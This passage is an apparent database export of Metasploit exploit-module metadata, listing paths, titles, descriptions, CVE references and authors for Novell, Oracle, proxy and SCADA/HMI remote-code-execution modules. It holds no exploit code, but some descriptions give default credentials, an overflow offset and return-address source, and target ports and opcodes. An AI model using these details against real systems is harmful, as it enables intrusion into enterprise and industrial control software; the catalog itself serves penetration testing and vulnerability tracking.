Examples of default credentials include: 'scrutinizer:admin', and 'scrutremote:admin'.","Metasploit Framework License (BSD)","f","2012-07-27 00:00:00",0,,"aggressive","t","CVE-2012-3951, OSVDB-84317, URL-http://secunia.com/advisories/50074/, URL-https://www.trustwave.com/spiderlabs/advisories/TWSL2012-014.txt","Jonathan Claudius, MC , Tanya Secker, sinn3r " 1011,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/nfs/xlink_nfsd.rb","exploit","windows/nfs/xlink_nfsd","exploit/windows/nfs/xlink_nfsd","Omni-NFS Server Buffer Overflow",200,"This module exploits a stack buffer overflow in Xlink Omni-NFS Server 5.2. When sending a specially crafted nfs packet, an attacker may be able to execute arbitrary code.","Metasploit Framework License (BSD)","t","2006-11-06 00:00:00",0,,"aggressive","t","BID-20941, CVE-2006-5780, OSVDB-30224, URL-http://www.securityfocus.com/data/vulnerabilities/exploits/omni-nfs-server-5.2-stackoverflow.pm","MC " 1012,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/nntp/ms05_030_nntp.rb","exploit","windows/nntp/ms05_030_nntp","exploit/windows/nntp/ms05_030_nntp","Microsoft Outlook Express NNTP Response Parsing Buffer Overflow",300,"This module exploits a stack buffer overflow in the news reader of Microsoft Outlook Express.","Metasploit Framework License (BSD)","f","2005-06-14 00:00:00",0,,"passive","t","BID-13951, CVE-2005-1213, MSB-MS05-030, OSVDB-17306","MC " 1013,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/novell/file_reporter_fsfui_upload.rb","exploit","windows/novell/file_reporter_fsfui_upload","exploit/windows/novell/file_reporter_fsfui_upload","NFR Agent FSFUI Record File Upload RCE",500,"NFRAgent.exe, a component of Novell File Reporter (NFR), allows remote attackers to upload arbitrary files via a directory traversal while handling requests to /FSF/CMD with FSFUI records with UICMD 130. 
This module has been tested successfully against NFR Agent 1.0.4.3 (File Reporter 1.0.2) and NFR Agent 1.0.3.22 (File Reporter 1.0.1).","Metasploit Framework License (BSD)","f","2012-11-16 00:00:00",0,,"aggressive","t","CVE-2012-4959, URL-https://community.rapid7.com/community/metasploit/blog/2012/11/16/nfr-agent-buffer-vulnerabilites-cve-2012-4959","juan vazquez " 1014,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/novell/groupwisemessenger_client.rb","exploit","windows/novell/groupwisemessenger_client","exploit/windows/novell/groupwisemessenger_client","Novell GroupWise Messenger Client Buffer Overflow",300,"This module exploits a stack buffer overflow in Novell's GroupWise Messenger Client. By sending a specially crafted HTTP response, an attacker may be able to execute arbitrary code.","Metasploit Framework License (BSD)","f","2008-07-02 00:00:00",0,,"passive","t","BID-29602, CVE-2008-2703, OSVDB-46041, URL-http://www.infobyte.com.ar/adv/ISR-17.html","MC " 1015,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/novell/netiq_pum_eval.rb","exploit","windows/novell/netiq_pum_eval","exploit/windows/novell/netiq_pum_eval","NetIQ Privileged User Manager 2.3.1 ldapagnt_eval() Remote Perl Code Execution",600,"This module abuses a lack of authorization in the NetIQ Privileged User Manager service (unifid.exe) to execute arbitrary perl code. The problem exists in the ldapagnt module. 
The module has been tested successfully on NetIQ PUM 2.3.1 over Windows 2003 SP2, which allows arbitrary code execution with SYSTEM privileges.","Metasploit Framework License (BSD)","t","2012-11-15 00:00:00",0,,"passive","t","BID-56539, EDB-22738, OSVDB-87334, URL-http://retrogod.altervista.org/9sg_novell_netiq_ldapagnt_adv.htm","juan vazquez , rgod" 1016,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/novell/nmap_stor.rb","exploit","windows/novell/nmap_stor","exploit/windows/novell/nmap_stor","Novell NetMail <= 3.52d NMAP STOR Buffer Overflow",200,"This module exploits a stack buffer overflow in Novell's Netmail 3.52 NMAP STOR verb. By sending an overly long string, an attacker can overwrite the buffer and control program execution.","Metasploit Framework License (BSD)","t","2006-12-23 00:00:00",0,,"aggressive","t","BID-21725, CVE-2006-6424, OSVDB-31363","MC " 1017,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/novell/zenworks_desktop_agent.rb","exploit","windows/novell/zenworks_desktop_agent","exploit/windows/novell/zenworks_desktop_agent","Novell ZENworks 6.5 Desktop/Server Management Overflow",400,"This module exploits a heap overflow in the Novell ZENworks Desktop Management agent. This vulnerability was discovered by Alex Wheeler.","BSD License","t","2005-05-19 00:00:00",0,,"aggressive","t","BID-13678, CVE-2005-1543, OSVDB-16698","Unknown" 1018,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/novell/zenworks_preboot_op21_bof.rb","exploit","windows/novell/zenworks_preboot_op21_bof","exploit/windows/novell/zenworks_preboot_op21_bof","Novell ZENworks Configuration Management Preboot Service 0x21 Buffer Overflow",300,"This module exploits a remote buffer overflow in the ZENworks Configuration Management 10 SP2. The vulnerability exists in the Preboot service and can be triggered by sending a specially crafted packet with the opcode 0x21 (PROXY_CMD_FTP_FILE) to port 998/TCP. 
The module has been successfully tested on Novell ZENworks Configuration Management 10 SP2 and Windows Server 2003 SP2 (DEP bypass).","Metasploit Framework License (BSD)","f","2010-03-30 00:00:00",0,,"aggressive","t","BID-40486, OSVDB-65361, URL-http://www.novell.com/support/kb/doc.php?id=7005572, URL-http://www.zerodayinitiative.com/advisories/ZDI-10-090/","Stephen Fewer, juan vazquez " 1019,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/novell/zenworks_preboot_op4c_bof.rb","exploit","windows/novell/zenworks_preboot_op4c_bof","exploit/windows/novell/zenworks_preboot_op4c_bof","Novell ZENworks Configuration Management Preboot Service 0x4c Buffer Overflow",300,"This module exploits a remote buffer overflow in the ZENworks Configuration Management. The vulnerability exists in the Preboot service and can be triggered by sending a specially crafted packet with the opcode 0x4c (PROXY_CMD_PREBOOT_TASK_INFO2) to port 998/TCP. The module has been successfully tested on Novell ZENworks Configuration Management 10 SP2 / SP3 and Windows Server 2003 SP2 (DEP bypass).","Metasploit Framework License (BSD)","f","2012-02-22 00:00:00",0,,"aggressive","t","BID-52659, CVE-2011-3176, OSVDB-80231, URL-http://support.novell.com/docs/Readmes/InfoDocument/patchbuilder/readme_5127930.html, URL-http://www.verisigninc.com/en_US/products-and-services/network-intelligence-availability/idefense/public-vulnerability-reports/articles/index.xhtml?id=974","Luigi Auriemma, juan vazquez " 1020,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/novell/zenworks_preboot_op6_bof.rb","exploit","windows/novell/zenworks_preboot_op6_bof","exploit/windows/novell/zenworks_preboot_op6_bof","Novell ZENworks Configuration Management Preboot Service 0x06 Buffer Overflow",300,"This module exploits a remote buffer overflow in the ZENworks Configuration Management 10 SP2. 
The vulnerability exists in the Preboot service and can be triggered by sending a specially crafted packet with the opcode 0x06 (PROXY_CMD_CLEAR_WS) to the 998/TCP port. The module has been successfully tested on Novell ZENworks Configuration Management 10 SP2 and Windows Server 2003 SP2 (DEP bypass).","Metasploit Framework License (BSD)","f","2010-03-30 00:00:00",0,,"aggressive","t","BID-40486, OSVDB-65361, URL-http://www.novell.com/support/kb/doc.php?id=7005572, URL-http://www.zerodayinitiative.com/advisories/ZDI-10-090/","Stephen Fewer, juan vazquez " 1021,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/novell/zenworks_preboot_op6c_bof.rb","exploit","windows/novell/zenworks_preboot_op6c_bof","exploit/windows/novell/zenworks_preboot_op6c_bof","Novell ZENworks Configuration Management Preboot Service 0x6c Buffer Overflow",300,"This module exploits a remote buffer overflow in the ZENworks Configuration Management. The vulnerability exists in the Preboot service and can be triggered by sending a specially crafted packet with the opcode 0x6c (PROXY_CMD_GET_NEXT_STEP) to port 998/TCP. 
The module has been successfully tested on Novell ZENworks Configuration Management 10 SP2 / SP3 and Windows Server 2003 SP2 (DEP bypass).","Metasploit Framework License (BSD)","f","2012-02-22 00:00:00",0,,"aggressive","t","BID-52659, CVE-2011-3175, OSVDB-80231, URL-http://support.novell.com/docs/Readmes/InfoDocument/patchbuilder/readme_5127930.html, URL-http://www.verisigninc.com/en_US/products-and-services/network-intelligence-availability/idefense/public-vulnerability-reports/articles/index.xhtml?id=973","Luigi Auriemma, juan vazquez " 1022,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/oracle/client_system_analyzer_upload.rb","exploit","windows/oracle/client_system_analyzer_upload","exploit/windows/oracle/client_system_analyzer_upload","Oracle Database Client System Analyzer Arbitrary File Upload",600,"This module exploits an arbitrary file upload vulnerability on the Client Analyzer component as included in Oracle Database 11g, which allows remote attackers to upload and execute arbitrary code. This module has been tested successfully on Oracle Database 11g 11.2.0.1.0 on Windows 2003 SP2, where execution through the Windows Management Instrumentation service has been used.","Metasploit Framework License (BSD)","t","2011-01-18 00:00:00",0,,"aggressive","t","BID-45883, CVE-2010-3600, OSVDB-70546, URL-http://www.oracle.com/technetwork/topics/security/cpujan2011-194091.html, URL-http://www.zerodayinitiative.com/advisories/ZDI-11-018/","1c239c43f521145fa8385d64a9c32243, juan vazquez " 1023,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/oracle/extjob.rb","exploit","windows/oracle/extjob","exploit/windows/oracle/extjob","Oracle Job Scheduler Named Pipe Command Execution",600,"This module exploits the Oracle Job Scheduler to execute arbitrary commands. 
The Job Scheduler is implemented via the component extjob.exe which listens on a named pipe called ""orcljsex"" and executes arbitrary commands received over this channel via CreateProcess(). In order to connect to the Named Pipe remotely, SMB access is required. Note that the Job Scheduler is disabled in default installations.","Metasploit Framework License (BSD)","t","2007-01-01 00:00:00",0,,"aggressive","t","URL-http://www.amazon.com/Oracle-Hackers-Handbook-Hacking-Defending/dp/0470080221","David Litchfield, juan vazquez , sinn3r " 1024,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/oracle/osb_ndmp_auth.rb","exploit","windows/oracle/osb_ndmp_auth","exploit/windows/oracle/osb_ndmp_auth","Oracle Secure Backup NDMP_CONNECT_CLIENT_AUTH Buffer Overflow",400,"The module exploits a stack buffer overflow in Oracle Secure Backup. When sending a specially crafted NDMP_CONNECT_CLIENT_AUTH packet, an attacker may be able to execute arbitrary code.","Metasploit Framework License (BSD)","t","2009-01-14 00:00:00",0,,"aggressive","t","CVE-2008-5444, OSVDB-51340, URL-http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpujan2009.html","MC " 1025,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/oracle/tns_arguments.rb","exploit","windows/oracle/tns_arguments","exploit/windows/oracle/tns_arguments","Oracle 8i TNS Listener (ARGUMENTS) Buffer Overflow",400,"This module exploits a stack buffer overflow in Oracle 8i. 
When sending a specially crafted packet containing an overly long ARGUMENTS string to the TNS service, an attacker may be able to execute arbitrary code.","Metasploit Framework License (BSD)","t","2001-06-28 00:00:00",0,,"aggressive","t","BID-2941, CVE-2001-0499, OSVDB-9427","MC " 1026,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/oracle/tns_auth_sesskey.rb","exploit","windows/oracle/tns_auth_sesskey","exploit/windows/oracle/tns_auth_sesskey","Oracle 10gR2 TNS Listener AUTH_SESSKEY Buffer Overflow",500,"This module exploits a stack buffer overflow in Oracle. When sending a specially crafted packet containing a long AUTH_SESSKEY value to the TNS service, an attacker may be able to execute arbitrary code.","Metasploit Framework License (BSD)","t","2009-10-20 00:00:00",0,,"aggressive","t","BID-36747, CVE-2009-1979, OSVDB-59110, URL-http://blogs.conus.info/node/28, URL-http://blogs.conus.info/node/35, URL-http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpuoct2009.html","jduck " 1027,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/oracle/tns_service_name.rb","exploit","windows/oracle/tns_service_name","exploit/windows/oracle/tns_service_name","Oracle 8i TNS Listener SERVICE_NAME Buffer Overflow",400,"This module exploits a stack buffer overflow in Oracle. 
When sending a specially crafted packet containing a long SERVICE_NAME to the TNS service, an attacker may be able to execute arbitrary code.","Metasploit Framework License (BSD)","t","2002-05-27 00:00:00",0,,"aggressive","t","BID-4845, CVE-2002-0965, OSVDB-5041, URL-http://www.appsecinc.com/resources/alerts/oracle/02-0013.shtml, URL-http://www.oracle.com/technology/deploy/security/pdf/net9_dos_alert.pdf","MC " 1028,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/pop3/seattlelab_pass.rb","exploit","windows/pop3/seattlelab_pass","exploit/windows/pop3/seattlelab_pass","Seattle Lab Mail 5.5 POP3 Buffer Overflow",500,"There exists an unauthenticated buffer overflow vulnerability in the POP3 server of Seattle Lab Mail 5.5 when sending a password with excessive length. Successful exploitation should not crash either the service or the server; however, after initial use the port cannot be reused for successive exploitation until the service has been restarted. Consider using a command execution payload following the bind shell to restart the service if you need to reuse the same port. The overflow appears to occur in the debugging/error reporting section of the slmail.exe executable, and there are multiple offsets that will lead to successful exploitation. This exploit uses 2606, the offset that creates the smallest overall payload. The other offset is 4654. The return address is overwritten with a ""jmp esp"" call from the application library SLMFC.DLL found in %SYSTEM%\system32\. This return address works against all versions of Windows and service packs. The last modification date on the library is dated 06/02/99. Assuming that the code where the overflow occurs has not changed in some time, prior versions of SLMail may also be vulnerable with this exploit. The author has not been able to acquire older versions of SLMail for testing purposes. 
Please let us know if you were able to get this exploit working against other SLMail versions.","Metasploit Framework License (BSD)","t","2003-05-07 00:00:00",0,,"aggressive","t","BID-7519, CVE-2003-0264, OSVDB-11975","stinko " 1029,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/postgres/postgres_payload.rb","exploit","windows/postgres/postgres_payload","exploit/windows/postgres/postgres_payload","PostgreSQL for Microsoft Windows Payload Execution",600,"On default Microsoft Windows installations of PostgreSQL the postgres service account may write to the current directory (which is usually ""C:\Program Files\PostgreSQL\\data"" where is the major.minor version of PostgreSQL). UDF DLLs may be sourced from there as well. This module uploads a Windows DLL file via the pg_largeobject method of binary injection and creates a UDF (user defined function) from that DLL. Because the payload is run from DllMain, it does not need to conform to specific Postgres API versions.","Metasploit Framework License (BSD)","f","2009-04-10 00:00:00",0,,"aggressive","t","URL-http://lab.lonerunners.net/blog/sqli-writing-files-to-disk-under-postgresql, URL-http://sqlmap.sourceforge.net/doc/BlackHat-Europe-09-Damele-A-G-Advanced-SQL-injection-whitepaper.pdf","Bernardo Damele A. G. , todb " 1030,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/proxy/bluecoat_winproxy_host.rb","exploit","windows/proxy/bluecoat_winproxy_host","exploit/windows/proxy/bluecoat_winproxy_host","Blue Coat WinProxy Host Header Overflow",500,"This module exploits a buffer overflow in the Blue Coat Systems WinProxy service by sending a long port value for the Host header in an HTTP request.","Metasploit Framework License (BSD)","t","2005-01-05 00:00:00",0,,"aggressive","t","BID-16147, CVE-2005-4085, OSVDB-22238, URL-http://www.bluecoat.com/support/knowledge/advisory_host_header_stack_overflow.html","MC " 1031,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/proxy/ccproxy_telnet_ping.rb","exploit","windows/proxy/ccproxy_telnet_ping","exploit/windows/proxy/ccproxy_telnet_ping","CCProxy <= v6.2 Telnet Proxy Ping Overflow",200,"This module exploits the YoungZSoft CCProxy <= v6.2 suite Telnet service. The stack is overwritten when sending an overly long address to the 'ping' command.","Metasploit Framework License (BSD)","f","2004-11-11 00:00:00",,,"aggressive","t","BID-11666, CVE-2004-2416, EDB-621, OSVDB-11593","patrick " 1032,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/proxy/proxypro_http_get.rb","exploit","windows/proxy/proxypro_http_get","exploit/windows/proxy/proxypro_http_get","Proxy-Pro Professional GateKeeper 4.7 GET Request Overflow",500,"This module exploits a stack buffer overflow in Proxy-Pro Professional GateKeeper 4.7. 
By sending a long HTTP GET to the default port of 3128, a remote attacker could overflow a buffer and execute arbitrary code.","Metasploit Framework License (BSD)","t","2004-02-23 00:00:00",0,,"aggressive","t","BID-9716, CVE-2004-0326, OSVDB-4027","MC " 1033,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/proxy/qbik_wingate_wwwproxy.rb","exploit","windows/proxy/qbik_wingate_wwwproxy","exploit/windows/proxy/qbik_wingate_wwwproxy","Qbik WinGate WWW Proxy Server URL Processing Overflow",400,"This module exploits a stack buffer overflow in Qbik WinGate version 6.1.1.1077 and earlier. By sending a malformed HTTP POST URL to the HTTP proxy service on port 80, a remote attacker could overflow a buffer and execute arbitrary code.","Metasploit Framework License (BSD)","t","2006-06-07 00:00:00",0,,"aggressive","t","BID-18312, CVE-2006-2926, OSVDB-26214","patrick " 1034,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/scada/citect_scada_odbc.rb","exploit","windows/scada/citect_scada_odbc","exploit/windows/scada/citect_scada_odbc","CitectSCADA/CitectFacilities ODBC Buffer Overflow",300,"This module exploits a stack buffer overflow in CitectSCADA's ODBC daemon. 
This has only been tested against Citect v5, v6 and v7.","Metasploit Framework License (BSD)","f","2008-06-11 00:00:00",,,"aggressive","t","BID-29634, CVE-2008-2639, OSVDB-46105, URL-http://www.auscert.org.au/render.html?it=9433, URL-http://www.citect.com/documents/news_and_media/pr-citect-address-security.pdf, URL-http://www.controsys.hu/anyagok/group_quality_assurance.pdf, URL-http://www.coresecurity.com/content/citect-scada-odbc-service-vulnerability","KF , patrick " 1035,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/scada/codesys_gateway_server_traversal.rb","exploit","windows/scada/codesys_gateway_server_traversal","exploit/windows/scada/codesys_gateway_server_traversal","SCADA 3S CoDeSys Gateway Server Directory Traversal",600,"This module exploits a directory traversal vulnerability that allows arbitrary file creation, which can be used to execute a mof file in order to gain remote execution within the SCADA system.","MSF_LICENSE","f","2013-02-02 00:00:00",0,,"aggressive","t","CVE-2012-4705, URL-http://ics-cert.us-cert.gov/pdf/ICSA-13-050-01-a.pdf","Enrique Sanchez " 1036,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/scada/codesys_web_server.rb","exploit","windows/scada/codesys_web_server","exploit/windows/scada/codesys_web_server","SCADA 3S CoDeSys CmpWebServer <= v3.4 SP4 Patch 2 Stack Buffer Overflow",300,"This module exploits a remote stack buffer overflow vulnerability in 3S-Smart Software Solutions product CoDeSys Scada Web Server Version 1.1.9.9.","Metasploit Framework License (BSD)","f","2011-12-02 00:00:00",,,"aggressive","t","CVE-2011-5007, EDB-18187, OSVDB-77387, URL-http://aluigi.altervista.org/adv/codesys_1-adv.txt, URL-http://www.us-cert.gov/control_systems/pdf/ICS-ALERT-11-336-01A.pdf, URL-http://www.us-cert.gov/control_systems/pdf/ICSA-12-006-01.pdf","Celil UNUVER, Luigi Auriemma, Michael Coppola, TecR0c , sinn3r " 1037,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/scada/daq_factory_bof.rb","exploit","windows/scada/daq_factory_bof","exploit/windows/scada/daq_factory_bof","DaqFactory HMI NETB Request Overflow",400,"This module exploits a stack buffer overflow in Azeotech's DaqFactory product. The specific vulnerability is triggered when sending a specially crafted 'NETB' request to port 20034. Exploitation of this vulnerability may take a few seconds due to the use of egghunter. This vulnerability was one of the 14 releases discovered by researcher Luigi Auriemma.","Metasploit Framework License (BSD)","f","2011-09-13 00:00:00",0,,"aggressive","t","CVE-2011-3492, OSVDB-75496, URL-http://aluigi.altervista.org/adv/daqfactory_1-adv.txt, URL-http://www.us-cert.gov/control_systems/pdf/ICSA-11-264-01.pdf","Luigi Auriemma, mr_me " 1038,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/scada/factorylink_csservice.rb","exploit","windows/scada/factorylink_csservice","exploit/windows/scada/factorylink_csservice","Siemens FactoryLink 8 CSService Logging Path Param Buffer Overflow",300,"This module exploits a vulnerability found on Siemens FactoryLink 8. 
The vulnerability occurs when CSService.exe processes a CSMSG_ListFiles_REQ message: the user-supplied path is first converted to ANSI format (CodePage 0), and then handled by a logging routine that does no proper bounds checking, causing a stack-based buffer overflow and resulting in arbitrary code execution.","Metasploit Framework License (BSD)","f","2011-03-25 00:00:00",,,"aggressive","t","OSVDB-72812, URL-http://aluigi.altervista.org/adv/factorylink_1-adv.txt, URL-http://www.us-cert.gov/control_systems/pdf/ICSA-11-091-01.pdf","Luigi Auriemma , sinn3r " 1039,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/scada/factorylink_vrn_09.rb","exploit","windows/scada/factorylink_vrn_09","exploit/windows/scada/factorylink_vrn_09","Siemens FactoryLink vrn.exe Opcode 9 Buffer Overflow",200,"This module exploits a stack buffer overflow in FactoryLink 7.5, 7.5 SP2, and 8.0.1.703. By sending a specially crafted packet, an attacker may be able to execute arbitrary code due to the improper use of a vsprintf() function while processing the user-supplied text field. Originally found and posted by Luigi Auriemma.","Metasploit Framework License (BSD)","t","2011-03-21 00:00:00",,,"aggressive","t","OSVDB-72815, URL-http://aluigi.altervista.org/adv/factorylink_4-adv.txt, URL-http://www.us-cert.gov/control_systems/pdf/ICSA-11-091-01.pdf","Luigi Auriemma, MC , hal" 1040,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/scada/iconics_genbroker.rb","exploit","windows/scada/iconics_genbroker","exploit/windows/scada/iconics_genbroker","Iconics GENESIS32 Integer overflow version 9.21.201.01",400,"The GenBroker service on port 38080 is affected by three integer overflow vulnerabilities while handling opcode 0x4b0, which is caused by abusing the memory allocations needed for the number of elements passed by the client. 
This results in unexpected behaviors such as direct registry calls, memory location calls, or arbitrary remote code execution. Please note that in order to ensure reliability, this exploit will try to open calc (hidden), inject itself into the process, and then open up a shell session. Also, DEP bypass is supported.","Metasploit Framework License (BSD)","f","2011-03-21 00:00:00",0,,"aggressive","t","OSVDB-72817, URL-http://aluigi.org/adv/genesis_4-adv.txt, URL-http://www.us-cert.gov/control_systems/pdf/ICS-ALERT-11-080-02.pdf","Lincoln, Luigi Auriemma, corelanc0d3r " 1041,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/scada/iconics_webhmi_setactivexguid.rb","exploit","windows/scada/iconics_webhmi_setactivexguid","exploit/windows/scada/iconics_webhmi_setactivexguid","ICONICS WebHMI ActiveX Buffer Overflow",400,"This module exploits a vulnerability found in ICONICS WebHMI's ActiveX control. By supplying a long string of data to the 'SetActiveXGUID' parameter, GenVersion.dll fails to do any proper bounds checking before this input is copied onto the stack, which causes a buffer overflow, and results in arbitrary code execution under the context of the user.","Metasploit Framework License (BSD)","f","2011-05-05 00:00:00",0,,"passive","t","CVE-2011-2089, EDB-17240, OSVDB-72135, URL-http://www.security-assessment.com/files/documents/advisory/ICONICS_WebHMI.pdf, URL-http://www.us-cert.gov/control_systems/pdf/ICS-ALERT-11-080-02.pdf","Blair Strang , Scoot Bell , sinn3r " 1042,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/scada/igss9_igssdataserver_listall.rb","exploit","windows/scada/igss9_igssdataserver_listall","exploit/windows/scada/igss9_igssdataserver_listall","7-Technologies IGSS <= v9.00.00 b11063 IGSSdataServer.exe Stack Buffer Overflow",400,"This module exploits a vulnerability in the igssdataserver.exe component of 7-Technologies IGSS up to version 9.00.00 b11063. 
While processing a ListAll command, the application fails to do proper bounds checking before copying data into a small buffer on the stack. This causes a buffer overflow and allows overwriting a structured exception handling record on the stack, allowing for unauthenticated remote code execution. Also, after the payload exits, IGSSdataServer.exe should automatically recover.","Metasploit Framework License (BSD)","f","2011-03-24 00:00:00",0,,"aggressive","t","CVE-2011-1567, OSVDB-72353, URL-http://aluigi.altervista.org/adv/igss_2-adv.txt, URL-http://www.us-cert.gov/control_systems/pdf/ICSA-11-132-01A.pdf","Lincoln, Luigi Auriemma, corelanc0d3r , sinn3r " 1043,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/scada/igss9_igssdataserver_rename.rb","exploit","windows/scada/igss9_igssdataserver_rename","exploit/windows/scada/igss9_igssdataserver_rename","7-Technologies IGSS 9 IGSSdataServer .RMS Rename Buffer Overflow",300,"This module exploits a vulnerability found on 7-Technologies IGSS 9. By supplying a long string of data to the 'Rename' (0x02), 'Delete' (0x03), or 'Add' (0x04) command, a buffer overflow condition occurs in IGSSdataServer.exe while handling an RMS report, which results in arbitrary code execution under the context of the user. The attack is carried out in three stages. The first stage sends the final payload to IGSSdataServer.exe, which will remain in memory. The second stage sends the Add command so the process can find a valid ID for the Rename command. The last stage then triggers the vulnerability with the Rename command, and uses an egghunter to search for the shellcode that we sent in stage 1. 
The use of an egghunter appears to be necessary due to the small buffer size, which cannot contain both our ROP chain and the final payload.","Metasploit Framework License (BSD)","f","2011-03-24 00:00:00",,,"aggressive","t","CVE-2011-1567, OSVDB-72352, URL-http://aluigi.altervista.org/adv/igss_5-adv.txt, URL-http://www.us-cert.gov/control_systems/pdf/ICSA-11-132-01A.pdf","Luigi Auriemma , sinn3r " 1044,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/scada/igss9_misc.rb","exploit","windows/scada/igss9_misc","exploit/windows/scada/igss9_misc","7-Technologies IGSS 9 Data Server/Collector Packet Handling Vulnerabilities",600,"This module exploits multiple vulnerabilities found on IGSS 9's Data Server and Data Collector services. The approach is to first transfer our binary with Write packets (opcode 0x0D) via port 12401 (igssdataserver.exe), and then send an EXE packet (opcode 0x0A) to port 12397 (dc.exe), which will cause dc.exe to run that payload with a CreateProcessA() call in a new thread.","Metasploit Framework License (BSD)","f","2011-03-24 00:00:00",,,"aggressive","t","CVE-2011-1565, CVE-2011-1566, OSVDB-72349, OSVDB-72354, URL-http://aluigi.altervista.org/adv/igss_1-adv.txt, URL-http://aluigi.altervista.org/adv/igss_8-adv.txt, URL-http://www.us-cert.gov/control_systems/pdf/ICSA-11-132-01A.pdf","Luigi Auriemma, sinn3r " 1045,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/scada/indusoft_webstudio_exec.rb","exploit","windows/scada/indusoft_webstudio_exec","exploit/windows/scada/indusoft_webstudio_exec","InduSoft Web Studio Arbitrary Upload Remote Code Execution",600,"This module exploits a lack of authentication and authorization on the InduSoft Web Studio Remote Agent, which allows a remote attacker to write arbitrary files to the filesystem by abusing the functions provided by the software. 
The module uses the Windows Management Instrumentation service to execute an arbitrary payload on vulnerable installations of InduSoft Web Studio on Windows versions prior to Vista. It has been successfully tested on InduSoft Web Studio 6.1 SP6 over Windows XP SP3 and Windows 2003 SP2.","Metasploit Framework License (BSD)","t","2011-11-04 00:00:00",0,,"aggressive","t","BID-50675, CVE-2011-4051, OSVDB-77179, URL-http://www.zerodayinitiative.com/advisories/ZDI-11-330","Luigi Auriemma, juan vazquez " 1046,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/scada/moxa_mdmtool.rb","exploit","windows/scada/moxa_mdmtool","exploit/windows/scada/moxa_mdmtool","MOXA Device Manager Tool 2.1 Buffer Overflow",500,"This module exploits a stack buffer overflow in MOXA MDM Tool 2.1. When sending a specially crafted MDMGw (MDM2_Gateway) response, an attacker may be able to execute arbitrary code.","Metasploit Framework License (BSD)","f","2010-10-20 00:00:00",0,,"passive","t","CVE-2010-4741, OSVDB-69027, URL-http://www.reversemode.com/index.php?option=com_content&task=view&id=70&Itemid=, URL-http://www.us-cert.gov/control_systems/pdf/ICSA-10-301-01A.pdf","MC , Ruben Santamarta" 1047,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/scada/procyon_core_server.rb","exploit","windows/scada/procyon_core_server","exploit/windows/scada/procyon_core_server","Procyon Core Server HMI <= v1.13 Coreservice.exe Stack Buffer Overflow",300,"This module exploits a vulnerability in the coreservice.exe component of Procyon Core Server <= v1.13. While processing a password, the application fails to do proper bounds checking before copying data into a small buffer on the stack. This causes a buffer overflow that overwrites a structured exception handling record on the stack, allowing unauthenticated remote code execution. 
Also, after the payload exits, Coreservice.exe should automatically recover.","Metasploit Framework License (BSD)","t","2011-09-08 00:00:00",0,,"aggressive","t","CVE-2011-3322, OSVDB-75371, URL-http://www.stratsec.net/Research/Advisories/Procyon-Core-Server-HMI-Remote-Stack-Overflow, URL-http://www.uscert.gov/control_systems/pdf/ICSA-11-216-01.pdf","Knud Hojgaard , mr_me " 1048,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/scada/realwin.rb","exploit","windows/scada/realwin","exploit/windows/scada/realwin","DATAC RealWin SCADA Server Buffer Overflow",500,"This module exploits a stack buffer overflow in DATAC Control International RealWin SCADA Server 2.0 (Build 6.0.10.37). By sending a specially crafted FC_INFOTAG/SET_CONTROL packet, an attacker may be able to execute arbitrary code.","Metasploit Framework License (BSD)","t","2008-09-26 00:00:00",0,,"aggressive","t","BID-31418, CVE-2008-4322, OSVDB-48606","MC " 1049,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/scada/realwin_on_fc_binfile_a.rb","exploit","windows/scada/realwin_on_fc_binfile_a","exploit/windows/scada/realwin_on_fc_binfile_a","DATAC RealWin SCADA Server 2 